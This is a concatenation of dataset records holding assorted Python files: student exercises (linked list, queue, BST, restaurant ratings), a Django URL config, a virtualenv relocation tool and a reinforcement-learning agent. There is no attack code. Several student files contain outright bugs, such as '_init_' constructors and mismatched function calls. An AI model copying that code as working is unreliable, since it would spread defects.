split_line = line.split(\":\")\n restaurant_name, rating = split_line\n ratings[restaurant_name] = rating\n \n initial_input = input(\"\"\"Would you like to:\n\n [S]ee all ratings\n [A]dd a rating\n [Q]uit\n\n > \"\"\")\n if initial_input == \"S\":\n sorted_ratings = sorted(ratings)\n for restaurant in sorted_ratings:\n print(f\"{restaurant} is rated at {ratings[restaurant]}\")\n elif initial_input == \"A\":\n user_restaurant = input(\"Input restaurant to rate: \")\n user_rating = input(\"Input rating: \")\n if user_rating in range(1,6):\n ratings[user_restaurant] = user_rating\n else:\n print(\"Rating must be a number from 1 to 5.\")\n elif initial_input == \"Q\":\n break\n \n the_file.close()\n\nrestaurant_ratings(\"scores.txt\")\n","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340591385","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'puppetodo'\r\nurlpatterns = [\r\n path('', views.Index.as_view(), name='index'),\r\n path('settings/', views.Settings.as_view(), name='settings'),\r\n path('task/mapping/', views.TaskMapping.as_view(), name='mapping'),\r\n path('task/mapping/create/', views.CreateTaskMapping.as_view(), name='create_mapping'),\r\n path('task/mapping/delete//', views.DeleteTaskMapping.as_view(), name='delete_mapping'),\r\n path('task/schedule/', views.TaskSchedule.as_view(), name='schedule'),\r\n path('task/schedule/create/', views.CreateTaskSchedule.as_view(), name='create_schedule'),\r\n path('task/loop/', views.TaskLoop.as_view(), name='loop'),\r\n path('data/reload/', views.DataReload.as_view(), name='reload'),\r\n]","sub_path":"puppetodo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459713288","text":"#Deleting Last node\n#Node Class\nclass node:\n\tdef _init_(self,data):\n\t\tself.data = data\n\t\tself.next = None\n#Linked list class\nclass LinkedList:\n\tdef _init_(self):\n\t\tself.head = None\n\t\tself.tail = None\n\t#adding elements\n\tdef append(self,data):\n\t\tnew_node = node(data)\n\t\tif self.head == None or self.tail == None:\n\t\t\tself.head = new_node\n\t\t\tself.tail = new_node\n\t\telse:\n\t\t\tself.tail.next = new_node\n\t\t\tself.tail = new_node\n\t#printing elements\n\tdef display(self):\n\t\tele = []\n\t\ttemp = self.head\n\t\twhile temp:\n\t\t\tele.append(temp.data)\n\t\t\ttemp = temp.next\n\t\tprint(\"Linked List: \",ele)\n\t#deleting last node function\n\tdef deleteLastNode(self):\n\t\ttemp = self.head\n\t\tpre_node = None\n\t\tprint(\"Tail Node:\",self.tail.data)\n\t\twhile temp:\n\t\t\tif temp == self.tail:\t\t\t\t\n\t\t\t\tpre_node.next = None\n\t\t\tpre_node = temp\n\t\t\ttemp = temp.next\n\nLL = LinkedList()\nn = int(input(\"Enter number of elements: \"))\nprint(\"Enter elements: \")\nfor i in range(n):\n\tk = int(input())\n\tLL.append(k)\n\nprint(\"Before: \")\nLL.display()\n\nLL.deleteLastNode()\nprint(\"New: \")\nLL.display()\n","sub_path":"L7-DelLastNode.py","file_name":"L7-DelLastNode.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"617173794","text":"import socket\n\n\nhost = 'localhost'\nport = 7070\nbufsize = 4096\naddr = (host, port)\n\nif __name__ == '__main__':\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n host = input(\"Type hostname: \") or host\n port = input(\"Type portnumber: \") or port\n addr = (host, port)\n\n client_sock.connect(addr)\n payload = 'GET TIME'\n\n try:\n while True:\n client_sock.send(payload.encode('utf-8'))\n data = client_sock.recv(bufsize)\n if not data:\n break\n print(repr(data))\n more = input(\"Want more?(y/n) \")\n if more.lower() == \"y\":\n payload = input(\"Type Command: \")\n else:\n break\n except:\n print(\"Something went wrong\")\n\n client_sock.close()\n","sub_path":"excss/resources/socket-practice/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509196040","text":"import math\n\n## 1. The volume of a sphere with radius r is 4/3 pi 3.\n## What is the volume of a sphere with radius 5?\n\ndef sphere_volume(radius):\n volume = (4 * math.pi * radius ** 3) / 3\n return volume\nprint(sphere_volume(5))\n\n'''\nOutput:\n523.598775598\n'''\n\n\n## 2. Suppose the cover price of a book is $24.95, but bookstores\n## get a 40% discount. Shipping costs $3 for the first copy and 75 cents\n## for each additional copy. What is the total wholesale cost for 60 copies?\n\ndef book_price(price, copies, disc, ship_1st, ship_rest):\n shipping = ship_1st + (copies - 1) * ship_rest\n price_disc = (1 - disc) * price\n whole_cost = copies * price_disc + shipping\n return whole_cost\nprint(book_price(24.95, 60, 0.40, 3, 0.75))\n\n'''\nOutput:\n945.45\n'''\n\n\n## 3. If I leave my house at 6:52 am and run 1 mile at an easy pace\n## (8:15 per mile), then 3 miles at tempo (7:12 per mile) and 1 mile\n## at easy pace again, what time do I get home for breakfast? \n\ndef round_time(miles, minutes, seconds):\n # Calculate seconds each round takes.\n all_sec = 60 * minutes + seconds\n round_sec = miles * all_sec\n return round_sec\n\ndef run_time(start_hr, start_min, rounds):\n # Calculate all times in smallest unit necessary (seconds).\n seconds = 3600 * start_hr + 60 * start_min\n for round in rounds:\n seconds += round_time(round[0], round[1], round[2])\n minutes = math.floor(seconds/60)\n time = divmod(minutes, 60)\n return time\n\nbreakfast = run_time(6, 52, [[1, 8, 15], [3, 7, 12], [1, 8, 15]])\nhour = str(int(breakfast[0]))\nminute = str(int(breakfast[1]))\nprint(hour + ':' + minute)\n\n'''\nOutput:\n7:30\n'''\n","sub_path":"d0009e/lit-thinkpython/chapter2/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526621790","text":"class Queue():\n def __init__(self):\n self.length = 10 ** 6\n self.q_list = [None] * (self.length + 1)\n self.head = 0\n self.tail = 0\n \n def enqueue(self, x):\n if self.is_full():\n# print('is_full')\n raise Exception\n# print('exec enqueue')\n self.q_list[self.tail] = x\n if self.tail == self.length - 1:\n self.tail = 0\n else:\n self.tail += 1\n \n def dequeue(self):\n if self.is_empty():\n raise Exception\n x = self.q_list[self.head]\n if self.head == self.length - 1:\n self.head = 0\n else:\n self.head += 1\n return x\n \n def is_empty(self):\n if self.head == self.tail:\n return True\n else:\n return False\n \n def is_full(self):\n# print('head', self.head, 'tail', self.tail)\n if self.head == self.tail + 1 or (self.head == 0 and self.tail == self.length-1):\n return True\n else:\n return False","sub_path":"data_structure/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424948371","text":"#!/usr/bin/env python\n\"\"\"\n move-virtualenv\n ~~~~~~~~~~~~~~~\n\n A helper script that moves virtualenvs to a new location.\n\n It only supports POSIX based virtualenvs and at the moment.\n\n :copyright: (c) 2012 by Fireteam Ltd.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nfrom __future__ import annotations\n\nimport argparse\nimport marshal\nimport os.path\nimport re\nimport shutil\nimport sys\nfrom types import CodeType\nfrom typing import NamedTuple\nfrom typing import Sequence\n\n\nACTIVATION_SCRIPTS = [\n 'activate',\n 'activate.csh',\n 'activate.fish',\n 'activate.xsh',\n]\n_pybin_match = re.compile(r'^python\\d+\\.\\d+$')\n_pypy_match = re.compile(r'^pypy\\d+.\\d+$')\n_activation_path_re = re.compile(\n r'^(?:set -gx |setenv |)VIRTUAL_ENV[ =][\\'\"](.*?)[\\'\"]\\s*$',\n)\nVERBOSE = False\n# magic length\n# + 4 byte timestamp\n# + 4 byte \"size\" hint was added to pyc files\n# PEP 552 (implemented in python 3.7) extends this by another word\nMAGIC_LENGTH = 4 + 4 + 4 + 4\n\n\ndef debug(msg: str) -> None:\n if VERBOSE:\n print(msg)\n\n\ndef update_activation_script(script_filename: str, new_path: str) -> None:\n \"\"\"Updates the paths for the activate shell scripts.\"\"\"\n with open(script_filename) as f:\n lines = list(f)\n\n def _handle_sub(match: re.Match[str]) -> str:\n text = match.group()\n start, end = match.span()\n g_start, g_end = match.span(1)\n return text[:(g_start - start)] + new_path + text[(g_end - end):]\n\n changed = False\n for idx, line in enumerate(lines):\n new_line = _activation_path_re.sub(_handle_sub, line)\n if line != new_line:\n lines[idx] = new_line\n changed = True\n\n if changed:\n debug('A %s' % script_filename)\n with open(script_filename, 'w') as f:\n f.writelines(lines)\n\n\ndef path_is_within(path: bytes, within: bytes) -> bool:\n relpath = os.path.relpath(path, within)\n return not relpath.startswith(b'.')\n\n\ndef update_script(\n script_filename: str,\n old_path_s: str,\n new_path_s: str,\n) -> None:\n \"\"\"Updates shebang lines for actual scripts.\"\"\"\n filesystem_encoding = sys.getfilesystemencoding()\n old_path = old_path_s.encode(filesystem_encoding)\n new_path = new_path_s.encode(filesystem_encoding)\n\n with open(script_filename, 'rb') as f:\n if f.read(2) != b'#!':\n return\n f.seek(0)\n lines = list(f)\n\n # is this a python script being run under a bourne exec call\n if (\n len(lines) >= 2 and\n lines[0] == b'#!/bin/sh\\n' and\n lines[1].startswith(b\"'''exec' \")\n ):\n args = lines[1].strip().split()\n\n if path_is_within(args[1], old_path):\n new_bin = os.path.join(\n new_path,\n os.path.relpath(args[1], old_path)\n )\n else:\n return\n\n args[1] = new_bin\n lines[1] = b' '.join(args) + b'\\n'\n else:\n args = lines[0][2:].strip().split()\n\n if not args:\n return\n\n if path_is_within(args[0], old_path):\n new_bin = os.path.join(\n new_path,\n os.path.relpath(args[0], old_path)\n )\n else:\n return\n\n args[0] = new_bin\n lines[0] = b'#!' + b' '.join(args) + b'\\n'\n\n debug('S %s' % script_filename)\n with open(script_filename, 'wb') as f:\n f.writelines(lines)\n\n\ndef update_scripts(\n bin_dir: str,\n orig_path: str,\n new_path: str,\n activation: bool = False,\n) -> None:\n \"\"\"Updates all scripts in the bin folder.\"\"\"\n for fname in os.listdir(bin_dir):\n path = os.path.join(bin_dir, fname)\n if fname in ACTIVATION_SCRIPTS and activation:\n update_activation_script(path, new_path)\n elif os.path.isfile(path):\n update_script(path, orig_path, new_path)\n\n\ndef update_pyc(filename: str, new_path: str) -> None:\n \"\"\"Updates the filenames stored in pyc files.\"\"\"\n with open(filename, 'rb') as rf:\n magic = rf.read(MAGIC_LENGTH)\n try:\n code = marshal.load(rf)\n except Exception:\n print('Error in %s' % filename)\n raise\n\n def _process(code: CodeType) -> CodeType:\n consts = []\n for const in code.co_consts:\n if type(const) is CodeType:\n const = _process(const)\n consts.append(const)\n if new_path != code.co_filename or consts != list(code.co_consts):\n code = code.replace(co_filename=new_path, co_consts=tuple(consts))\n return code\n\n new_code = _process(code)\n\n if new_code is not code:\n debug('B %s' % filename)\n with open(filename, 'wb') as wf:\n wf.write(magic)\n marshal.dump(new_code, wf)\n\n\ndef update_pycs(lib_dir: str, new_path: str) -> None:\n \"\"\"Walks over all pyc files and updates their paths.\"\"\"\n def get_new_path(filename: str) -> str:\n filename = os.path.normpath(filename)\n return os.path.join(new_path, filename[len(lib_dir) + 1:])\n\n for dirname, dirnames, filenames in os.walk(lib_dir):\n for filename in filenames:\n if (\n filename.endswith(('.pyc', '.pyo')) and\n # python 2, virtualenv 20.x symlinks os.pyc\n not os.path.islink(os.path.join(dirname, filename))\n ):\n filename = os.path.join(dirname, filename)\n local_path = get_new_path(filename)\n update_pyc(filename, local_path)\n\n\ndef _update_pth_file(pth_filename: str, orig_path: str) -> None:\n with open(pth_filename) as f:\n lines = f.readlines()\n changed = False\n for i, line in enumerate(lines):\n val = line.strip()\n if val.startswith('import ') or not os.path.isabs(val):\n continue\n changed = True\n relto_original = os.path.relpath(val, orig_path)\n # If we are moving a pypy venv the site-packages directory\n # is in a different location than if we are moving a cpython venv\n relto_pth = os.path.join(\n '../../..', # venv/lib/pythonX.X/site-packages\n relto_original\n )\n lines[i] = f'{relto_pth}\\n'\n if changed:\n with open(pth_filename, 'w') as f:\n f.write(''.join(lines))\n debug(f'P {pth_filename}')\n\n\ndef update_pth_files(site_packages: str, orig_path: str) -> None:\n \"\"\"Converts /full/paths in pth files to relative relocatable paths.\"\"\"\n for filename in os.listdir(site_packages):\n filename = os.path.join(site_packages, filename)\n if filename.endswith('.pth') and os.path.isfile(filename):\n _update_pth_file(filename, orig_path)\n\n\ndef remove_local(base: str) -> None:\n \"\"\"On some systems virtualenv seems to have something like a local\n directory with symlinks. This directory is safe to remove in modern\n versions of virtualenv. Delete it.\n \"\"\"\n local_dir = os.path.join(base, 'local')\n if os.path.exists(local_dir): # pragma: no cover (not all systems)\n debug(f'D {local_dir}')\n shutil.rmtree(local_dir)\n\n\ndef update_paths(venv: Virtualenv, new_path: str) -> None:\n \"\"\"Updates all paths in a virtualenv to a new one.\"\"\"\n update_scripts(venv.bin_dir, venv.orig_path, new_path)\n for lib_dir in venv.lib_dirs:\n update_pycs(lib_dir, new_path)\n update_pth_files(venv.site_packages, venv.orig_path)\n remove_local(venv.path)\n update_scripts(venv.bin_dir, venv.orig_path, new_path, activation=True)\n\n\ndef get_orig_path(venv_path: str) -> str:\n \"\"\"This helps us know whether someone has tried to relocate the\n virtualenv\n \"\"\"\n activate_path = os.path.join(venv_path, 'bin/activate')\n\n with open(activate_path) as activate:\n for line in activate:\n # virtualenv 20 changes the position\n for possible in ('VIRTUAL_ENV=\"', \"VIRTUAL_ENV='\"):\n if line.startswith(possible):\n return line.split(possible[-1], 2)[1]\n else:\n raise AssertionError(\n 'Could not find VIRTUAL_ENV= in activation script: %s' %\n activate_path\n )\n\n\nclass NotAVirtualenvError(ValueError):\n def __str__(self) -> str:\n return '{} is not a virtualenv: not a {}: {}'.format(*self.args)\n\n\nclass Virtualenv(NamedTuple):\n path: str\n bin_dir: str\n lib_dirs: list[str]\n site_packages: str\n orig_path: str\n\n\ndef _get_original_state(path: str) -> Virtualenv:\n is_pypy = os.path.isfile(os.path.join(path, 'bin', 'pypy'))\n bin_dir = os.path.join(path, 'bin')\n base_lib_dir = os.path.join(path, 'lib')\n activate_file = os.path.join(bin_dir, 'activate')\n\n for dir_path in (bin_dir, base_lib_dir):\n if not os.path.isdir(dir_path):\n raise NotAVirtualenvError(path, 'directory', dir_path)\n if not os.path.isfile(activate_file):\n raise NotAVirtualenvError(path, 'file', activate_file)\n\n matcher = _pypy_match if is_pypy else _pybin_match\n lib_dirs = [\n os.path.join(base_lib_dir, potential_lib_dir)\n for potential_lib_dir in os.listdir(base_lib_dir)\n if matcher.match(potential_lib_dir)\n ]\n if len(lib_dirs) != 1:\n raise NotAVirtualenvError(\n path,\n 'directory',\n os.path.join(base_lib_dir, 'pypy#.#)' if is_pypy else 'python#.#'),\n )\n lib_dir, = lib_dirs\n\n site_packages = os.path.join(lib_dir, 'site-packages')\n if not os.path.isdir(site_packages):\n raise NotAVirtualenvError(path, 'directory', site_packages)\n\n return Virtualenv(\n path=path,\n bin_dir=bin_dir,\n lib_dirs=[lib_dir],\n site_packages=site_packages,\n orig_path=get_orig_path(path),\n )\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--update-path',\n required=True,\n help=(\n 'Update the path for all required executables and helper files '\n 'that are supported to the new python prefix. You can also set '\n 'this to \"auto\" for autodetection.'\n ),\n )\n parser.add_argument(\n '--verbose', action='store_true', help='show a listing of changes',\n )\n parser.add_argument('path', default='.', nargs='?')\n args = parser.parse_args(argv)\n\n global VERBOSE\n VERBOSE = args.verbose\n\n if args.update_path == 'auto':\n update_path = os.path.abspath(args.path)\n else:\n update_path = args.update_path\n\n if not os.path.isabs(update_path):\n print(f'--update-path must be absolute: {update_path}')\n return 1\n\n try:\n venv = _get_original_state(path=args.path)\n except NotAVirtualenvError as e:\n print(e)\n return 1\n\n if venv.orig_path == update_path:\n print(f'Already up-to-date: {venv.path} ({update_path})')\n return 0\n\n update_paths(venv, update_path)\n print(f'Updated: {venv.path} ({venv.orig_path} -> {update_path})')\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","sub_path":"virtualenv_tools.py","file_name":"virtualenv_tools.py","file_ext":"py","file_size_in_byte":11141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"469313551","text":"# Learning from advice with auxiliary incentive.\nfrom rltk.common.maths import polyak_averaging\nfrom .ddpg import DDPG, TD3\nimport torch\nimport random\nimport numpy as np\n\n\nclass DDPG_LEA(DDPG):\n def __init__(\n self,\n library,\n pi_reuse,\n reuse: bool = True,\n num_commit: int = 1,\n lam_pi_guidance: float = 0.001,\n use_pi_guidance: bool = False,\n use_q_guidance: bool = False,\n lam_aux_policy_guidance: float = 0.001,\n aux_policy_guidance_version: int = 0,\n *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n self.library = library\n self.library.append(self.targets.actor)\n self.reuse = reuse\n self.pi_reuse = pi_reuse\n self.num_commit = num_commit\n self.index_commit = None\n # When the agent reuse advice it should commit to the advisor\n # during a number 'num_commit' times.\n self.in_reuse_mode = False\n self.last_n_commint = self.num_commit\n self.use_q_guidance = use_q_guidance\n self.use_pi_guidance = use_pi_guidance\n self.lam_pi_guidance = lam_pi_guidance\n self.count_advice = np.zeros(len(self.library))\n self.lam_aux_policy_guidance = lam_aux_policy_guidance\n self.aux_policy_guidance_version = aux_policy_guidance_version\n\n def act(self, obses, mode: str = \"train\"):\n if mode == \"train\" and self.in_reuse_mode and self.reuse:\n with torch.no_grad():\n self.last_n_commint -= 1\n action = self.library[self.index_commit](obses).cpu().numpy()\n action = np.clip(action, -1, 1)\n # Increment the count of played advice\n self.count_advice[self.index_commit] += 1\n if self.last_n_commint == 0:\n self.index_commit = None\n self.in_reuse_mode = False\n self.last_n_commint = self.num_commit\n return action, {}\n if (not self.in_reuse_mode and random.random() >= self.pi_reuse) or (\n not mode == \"train\" or not self.reuse\n ):\n if mode == \"train\":\n # Student policy is played.\n self.count_advice[-1] += 1\n return super().act(obses, mode=mode)\n\n if not self.reuse:\n raise ValueError()\n\n advice = [advisor(obses) for advisor in self.library]\n action, index = self.filter(obses, advice)\n self.in_reuse_mode = True\n self.index_commit = index\n action = np.clip(action, -1, 1)\n self.count_advice[self.index_commit] += 1\n return action, {}\n\n @torch.no_grad()\n def filter(self, x, advice):\n # NOTE: MERGE\n if len(x.shape) == 1:\n index = torch.argmax(\n torch.cat([self.targets.critic(x, a) for a in advice])\n ).item()\n return advice[index].detach().cpu().numpy(), index\n q = torch.stack([self.targets.critic(x, a) for a in advice])\n index = torch.argmax(q, dim=0)\n advice = torch.stack(advice)\n best_advice = advice[index.squeeze(-1), range(advice.shape[1])]\n return best_advice, index\n\n def update(self, obses, action, reward, mask, next_obses):\n loss_actor = self.learn_actor(obses)\n loss_critic = self.learn_critic(obses, reward, action, mask, next_obses)\n\n self.optims.critic.zero_grad()\n loss_critic.backward()\n if self.max_grad_norm > 0.0:\n torch.nn.utils.clip_grad_norm_(\n self.models.critic.parameters(), self.max_grad_norm, norm_type=2\n )\n self.optims.critic.step()\n\n self.optims.actor.zero_grad()\n loss_actor.backward()\n if self.max_grad_norm > 0.0:\n torch.nn.utils.clip_grad_norm_(\n self.models.actor.parameters(), self.max_grad_norm, norm_type=2\n )\n self.optims.actor.step()\n for k, v in self.targets.items():\n polyak_averaging(self.models[k], v, tau=self.polyak)\n\n def learn_critic(self, obses, reward, action, mask, next_obses):\n with torch.no_grad():\n if not self.use_q_guidance:\n next_action = self.targets.actor(next_obses)\n else:\n advice = [advisor(next_obses) for advisor in self.library]\n next_action, _ = self.filter(next_obses, advice)\n next_qfunc = self.targets.critic(next_obses, next_action)\n target = reward + self.gamma * mask * next_qfunc.squeeze(1)\n qfunc = self.models.critic(obses, action).squeeze(1)\n assert target.shape == qfunc.shape\n loss = (qfunc - target).pow(2).mean().mul(0.5)\n if self.logger is not None:\n self.logger.store(loss_critic=np.round(loss.item(), 3))\n return loss\n\n def learn_actor(self, obses):\n action = self.models.actor(obses)\n action_penalty = self.action_penalty_lam * action.pow(2).mean()\n q_sa = self.models.critic(obses, action)\n loss = q_sa.mean().neg()\n loss += action_penalty\n # Auxiliary Incentive to surpass Experts. --------------------------------------\n if self.use_q_guidance:\n advice = [advisor(obses) for advisor in self.library]\n if self.aux_policy_guidance_version == 0:\n q_sa = torch.stack([self.targets.critic(obses, a) for a in advice])\n q_sa_max = torch.max(q_sa, dim=0)[0]\n loss = loss + self.lam_aux_policy_guidance * (q_sa - q_sa_max).pow(2).mean()\n elif self.lam_aux_policy_guidance == 1:\n raise # APPLY WITH SOFTMAX\n q_sa = torch.stack([self.targets.critic(obses, a) for a in advice])\n q_sa_max = torch.max(q_sa, dim=0)[0]\n loss = loss + self.lam_aux_policy_guidance * (q_sa - q_sa_max).pow(2).mean()\n else:\n raise NotImplementedError()\n # -------------------------------------------------------------------------------\n if self.use_pi_guidance:\n advice = [advisor(obses) for advisor in self.library]\n best_advice, index = self.filter(obses, advice)\n loss_pi_guidance = self.lam_pi_guidance * \\\n (action - best_advice).sum().pow(2).mul(0.5)\n assert loss.shape == loss_pi_guidance.shape\n loss = loss + loss_pi_guidance\n if self.logger is not None:\n self.logger.store(loss_pi_guidance=np.round(loss_pi_guidance.item(), 3))\n if self.logger is not None:\n self.logger.store(loss_actor=np.round(loss.item(), 3))\n return loss\n","sub_path":"rl/lea_v2.py","file_name":"lea_v2.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140363192","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n N = [n]\n head = self.recursiveFindAndRemove(head, N)\n return head\n\n def recursiveFindAndRemove(self, head, N):\n if not head: return head\n head.next = self.recursiveFindAndRemove(head.next, N)\n N[0]-=1\n return head.next if N[0]==0 else head\n","sub_path":"Leetcode/linkedlist/19_Remove Nth Node from End of List/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"164503353","text":"#!/usr/bin/python\n#\\file terminal_tab5a.py\n#\\brief Test of using the library terminal_tab5lib.py;\n#\\author Akihiko Yamaguchi, info@akihikoy.net\n#\\version 0.1\n#\\date Sep.10, 2017\n\nfrom terminal_tab5lib import RunTerminalTab\n\nif __name__=='__main__':\n E= 'Enter'\n terminals= [\n ('main1',[\n ('Init',[':all','ros',E,'norobot',E]),\n ('Exit',':close') ]),\n ('rviz',[\n (':pair', ('rviz',['rviz',E]),\n ('kill',['C-c']) ) ]),\n ('s2',[\n ('ls',('ls',E)),\n ('nodes',['rostopic list',E]),\n ('topics',['rosnode list',E]) ]),\n ]\n exit_command= [E,'C-c']\n RunTerminalTab('Test Launcher',terminals,exit_command)\n","sub_path":"python/qt/terminal_tab/terminal_tab5a.py","file_name":"terminal_tab5a.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624764963","text":"from .english_corpus import EnglishCorpus\n\n\nclass CLTKCorpus(EnglishCorpus):\n\n def lemmatize(self, return_string=True, return_raw=False): # pragma: no cover\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Lemmatizing', counter)\n new_doc = doc.lemmatize(\n return_string=return_string,\n return_raw=return_raw,\n )\n new_docs.append(new_doc)\n self.update(None, None)\n return self.__class__(new_docs, **self.settings)\n\n def scansion(self): # pragma: no cover\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Performing Scansion', counter)\n new_docs.append(doc.scansion())\n self.update(None, None)\n return new_docs\n\n def entities(self):\n new_docs = []\n counter = 0\n for doc in self.data:\n counter += 1\n self.update('Scanning entities', counter)\n new_docs.append(doc.entities())\n self.update(None, None)\n return new_docs\n","sub_path":"build/lib/arakhne/corpus/cltk_corpus.py","file_name":"cltk_corpus.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576360488","text":"# File: a6q3.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\n# CMPT 145: Primitive Binary Search Trees\n# Defines functions for primitive Binary Search Tree data structure\n#\n# A Primitive Binary Tree is defined as follows:\n# 1. The value None is a primitive binary tree;\n# None is an empty tree.\n# 2. If lt and rt are primitive binary trees, and d is any value\n# treenode.create(d, lt, rt) is a primitive binary tree.\n\n# A Primitive Binary Tree t satisfies the Binary Search Tree property\n# if all of the following hold:\n# 1. The data value stored in t is greater than any data value in\n# t's left subtree (if any)\n# 2. The data value stored in t is less than any data value in\n# t's right subtree (if any)\n# 3. T's left subtree satisfies the BST property\n# 4. T's right subtree satisfies the BST property\n\nimport kvtreenode as kvtn\n\n\ndef member_prim(tnode, key):\n \"\"\"\n Check if key is stored in the binary search tree.\n Preconditions:\n :param tnode: a binary search tree\n :param key: a key\n Postconditions:\n If the key is not already in the tree, it is added to the tree\n :return: True if key is in the tree\n \"\"\"\n if tnode is None:\n return False\n else:\n ckey = kvtn.get_key(tnode)\n if ckey == key:\n # found the key\n return True\n elif key < ckey:\n # use the BST property\n return member_prim(kvtn.get_left(tnode), key)\n else:\n return member_prim(kvtn.get_right(tnode), key)\n\n\ndef insert_prim(tnode, key, value):\n \"\"\"\n Insert a new value into the binary tree.\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: a value\n Postconditions:\n If the value is not already in the tree, it is added to the tree\n Return\n :return: flag, tree\n Flag is True is insertion succeeded; tree is the tree with value in it\n Flag is False if the value is already in the tree, tree is returned unchanged\n \"\"\"\n\n if tnode is None:\n return True, kvtn.create(key, value)\n else:\n ckey = kvtn.get_key(tnode)\n if ckey == key:\n return False, tnode\n elif key < ckey:\n flag, subtree = insert_prim(kvtn.get_left(tnode), key)\n if flag:\n kvtn.set_left(tnode, subtree)\n return flag, tnode\n else:\n flag, subtree = insert_prim(kvtn.get_right(tnode), key)\n if flag:\n kvtn.set_right(tnode, subtree)\n return flag, tnode\n\n\ndef delete_prim_helper(node, value, is_left_node=None, parent=None):\n \"\"\"\n Helper function for delete_prim(tnode, value)\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: the value to delete from tnode\n :param is_left_node: is root the left node of parent?\n :param parent: the parent node of root\n Postconditions:\n If the value is in the tree, it is deleted.\n If the value is not there, there is no change to the tree.\n :return: True is the value was deleted, False otherwise\n \"\"\"\n def reconnect(root):\n def largest_node_lsub():\n # find the largest node in the left subtree\n largest = kvtn.get_right(lsub)\n if largest is None:\n return lsub\n while kvtn.get_right(largest) is not None:\n largest = kvtn.get_right(largest)\n return largest\n\n lsub = kvtn.get_left(root) # left subtree\n rsub = kvtn.get_right(root) # right subtree\n if lsub == None and rsub == None: # root has no children\n return None\n if lsub == None and rsub != None: # root has right subtree, but no left\n return rsub\n if lsub != None and rsub == None: # root has left subtree, but no right\n return lsub\n else: # root has two children\n # Attach the root's right child as the right child of the largest node\n # in the left subtree\n kvtn.set_right(largest_node_lsub(), rsub)\n return lsub\n\n if node is None:\n return False\n cval = kvtn.get_data(node)\n if value == cval:\n if is_left_node is None:\n tnode = None\n elif is_left_node:\n kvtn.set_left(parent, reconnect(node))\n else:\n kvtn.set_right(parent, reconnect(node))\n return True\n elif value < cval:\n return delete_prim_helper(kvtn.get_left(node), value, True, node)\n else:\n return delete_prim_helper(kvtn.get_right(node), value, False, node)\n\n\ndef delete_prim(tnode, value):\n \"\"\"\n Delete a value from the binary tree.\n Preconditions:\n :param tnode: a binary search tree, created by create()\n :param value: a value\n Postconditions:\n If the value is in the tree, it is deleted.\n If the value is not there, there is no change to the tree.\n Return:\n :return: (True, tnode) is the value was deleted, tree changed\n (False, tnode) otherwise (tnode unchanged)\n \"\"\"\n return delete_prim_helper(tnode, value), tnode\n\n\nif __name__ == '__main__':\n # define some functions to do unit testing on the primbst functions\n def unit_member(atree, value, expected, reason):\n \"\"\"\n Purpose: Test member_prim.\n Preconditions:\n :param atree: A primitive binary tree with the BST property\n :param value: A value to search for\n :param expected: The expected result of member_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag = member_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: member_prim returned:\", flag, reason)\n\n\n def unit_insert(atree, value, expected, reason):\n \"\"\"\n Purpose: Test insert_prim.\n Preconditions:\n :param atree: A primitive binary tree with the BST property\n :param value: A value to insert into the tree\n :param expected: The expected result of insert_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag, result = insert_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: insert_prim returned:\", flag, reason)\n\n\n def unit_delete(atree, value, expected, reason):\n \"\"\"\n Purpose: Test delete_prim.\n Preconditions:\n :param atree: A primitive binary tree with the BST property\n :param value: A value to delete\n :param expected: The expected result of delete_prim(atree,value)\n :param reason: A string about the reason for the test\n Return:\n :return: none\n \"\"\"\n flag, result = delete_prim(atree, value)\n if flag is not expected:\n print(\"Unit Test error: delete_prim returned:\", flag, reason)\n\n\n #################################################\n # unit test all functions\n\n def small_tree():\n return 